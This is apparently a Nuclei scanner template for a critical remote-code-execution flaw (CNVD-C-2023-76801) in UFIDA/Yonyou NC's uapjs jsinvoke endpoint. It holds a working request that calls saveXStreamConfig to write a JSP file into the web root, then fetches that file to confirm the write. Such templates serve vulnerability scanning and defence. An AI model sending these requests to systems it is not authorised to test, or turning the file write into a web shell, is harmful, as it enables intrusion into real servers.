id: CNVD-C-2023-76801

info:
  name: UFIDA NC uapjs - RCE vulnerability
  author: SleepingBag945
  severity: critical
  description: There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks.
  metadata:
    max-request: 2
  tags: cnvd,cnvd2023,yonyou,rce

http:
  - raw:
      - |
        POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;charset=UTF-8

        {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig",
        "parameterTypes":["java.lang.Object","java.lang.String"],
        "parameters":["{{randstr_2}}","webapps/nc_web/{{randstr_1}}.jsp"]}

      - |
        GET /{{randstr_1}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 200
          - status_code_2 == 200 && contains(body_2,"{{randstr_2}}")
        condition: and